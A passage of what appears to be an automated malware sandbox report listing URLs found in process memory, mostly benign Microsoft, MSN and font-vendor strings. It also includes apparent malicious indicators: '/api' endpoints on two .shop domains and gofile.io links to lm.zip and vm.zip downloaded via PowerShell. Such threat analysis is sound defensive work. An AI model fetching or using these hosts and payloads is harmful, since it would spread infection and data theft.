Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 8EC7.exe String found in binary or memory: http://www.oberhumer.com
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000001.00000000.1701590540.000000000C893000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirmr
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B8F61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9BA3C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9BA3C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: explorer.exe, 00000001.00000000.1701590540.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1699388658.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1699388658.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1696852215.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1696258763.0000000001240000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1699388658.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1699388658.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003385000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2641040146.000000000339A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2718535898.00000000033D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/
Source: BitLockerToGo.exe, 00000010.00000003.2735965343.00000000033D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/1
Source: BitLockerToGo.exe, 00000010.00000003.2735965343.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000002.2754629289.00000000033D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/K36
Source: BitLockerToGo.exe, 00000010.00000003.2686356498.00000000033D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/U$q
Source: BitLockerToGo.exe, 00000010.00000003.2686356498.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2693111350.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2718535898.00000000033D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/a
Source: BitLockerToGo.exe, 00000010.00000003.2735965343.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000002.2754629289.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000002.2751996058.0000000003377000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2686356498.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2569617085.000000000339A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2693111350.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003385000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000002.2751996058.0000000003385000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2718535898.00000000033D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/api
Source: BitLockerToGo.exe, 00000010.00000003.2569617085.000000000339A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003385000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/api-
Source: BitLockerToGo.exe, 00000010.00000003.2569617085.000000000339A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003385000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/api1
Source: BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/api5
Source: BitLockerToGo.exe, 00000010.00000003.2693111350.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2718535898.00000000033D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/apidows
Source: BitLockerToGo.exe, 00000010.00000002.2751996058.0000000003377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/apiple-sto:s
Source: BitLockerToGo.exe, 00000010.00000003.2686356498.00000000033D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/d3
Source: BitLockerToGo.exe, 00000010.00000003.2735965343.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2686356498.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2693111350.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2718535898.00000000033D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/ly3$
Source: BitLockerToGo.exe, 00000010.00000003.2718921758.00000000054AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop:443/api
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 0000000E.00000002.2701783399.000001B9C8FCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.2701783399.000001B9C8FCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.2701783399.000001B9C8FCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000001.00000000.1701590540.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9BA954000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: lm.exe, 00000014.00000003.2707939700.000000000053F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2745784061.000000000053F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://liernessfornicsa.shop/
Source: lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://liernessfornicsa.shop/)
Source: lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://liernessfornicsa.shop/E
Source: lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2885232265.000000000053F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://liernessfornicsa.shop/N
Source: lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://liernessfornicsa.shop/T
Source: lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2885232265.000000000053F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://liernessfornicsa.shop/V
Source: lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://liernessfornicsa.shop/a
Source: lm.exe, 00000014.00000002.3067577617.0000000003107000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2885591470.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2652802759.000000000053F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://liernessfornicsa.shop/api
Source: lm.exe, 00000014.00000003.2884414259.0000000003107000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000002.3067577617.0000000003107000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://liernessfornicsa.shop/apiGwP
Source: lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://liernessfornicsa.shop/api_
Source: lm.exe, 00000014.00000003.2851808320.0000000003107000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://liernessfornicsa.shop/apicw4
Source: lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://liernessfornicsa.shop/f
Source: lm.exe, 00000014.00000003.2708630118.000000000053F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2709067186.000000000053F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707939700.000000000053F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://liernessfornicsa.shop/ro
Source: lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2885232265.000000000053F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://liernessfornicsa.shop/t
Source: lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://liernessfornicsa.shop:443/apiCLSID
Source: powershell.exe, 0000000E.00000002.2701783399.000001B9C8FCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000001.00000000.1701590540.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1701590540.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: 2D42.exe, 0000000A.00000002.2754935748.000001E002628000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co
Source: 2D42.exe, 0000000A.00000002.2754935748.000001E002628000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co/mi
Source: 2D42.exe, 0000000A.00000002.2754935748.000001E0025A8000.00000004.00000800.00020000.00000000.sdmp, 2D42.exe, 0000000A.00000002.2754935748.000001E002628000.00000004.00000800.00020000.00000000.sdmp, 2D42.exe, 0000000A.00000002.2754935748.000001E0024F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co/microgods/raw
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9BA61B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://store4.gofile.io
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip
Source: BitLockerToGo.exe, 00000010.00000003.2570920749.0000000005500000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2653203058.0000000003206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BitLockerToGo.exe, 00000010.00000003.2571390512.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2570920749.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2653203058.0000000003206000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2653936321.0000000003165000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2657215472.0000000003165000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: BitLockerToGo.exe, 00000010.00000003.2571390512.00000000054D2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2655706215.0000000003141000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: BitLockerToGo.exe, 00000010.00000003.2571390512.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2570920749.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2653203058.0000000003206000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2653936321.0000000003165000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2657215472.0000000003165000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: BitLockerToGo.exe, 00000010.00000003.2571390512.00000000054D2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2655706215.0000000003141000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1701590540.000000000C557000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1701590540.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
